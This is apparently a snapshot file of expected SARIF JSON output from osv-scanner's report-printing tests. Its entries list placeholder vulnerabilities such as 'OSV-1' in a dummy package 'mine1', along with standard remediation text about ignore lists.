"location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1' (also known as 'GHSA-123')." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1' (also known as 'GHSA-123')." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1", "GHSA-123" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**\n(Also published as: [GHSA-123](https://osv.dev/GHSA-123), ).\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n## [GHSA-123](https://osv.dev/GHSA-123)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**\n(Also published as: [GHSA-123](https://osv.dev/GHSA-123), ).\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n## [GHSA-123](https://osv.dev/GHSA-123)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1' (also known as 'GHSA-123')." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1' (also known as 'GHSA-123')." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1", "GHSA-123" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**\n(Also published as: [GHSA-123](https://osv.dev/GHSA-123), ).\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n## [GHSA-123](https://osv.dev/GHSA-123)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**\n(Also published as: [GHSA-123](https://osv.dev/GHSA-123), ).\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n## [GHSA-123](https://osv.dev/GHSA-123)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1' (also known as 'GHSA-123')." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1' (also known as 'GHSA-123')." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1", "GHSA-123" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**\n(Also published as: [GHSA-123](https://osv.dev/GHSA-123), ).\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n## [GHSA-123](https://osv.dev/GHSA-123)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**\n(Also published as: [GHSA-123](https://osv.dev/GHSA-123), ).\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n## [GHSA-123](https://osv.dev/GHSA-123)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@abc123' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## 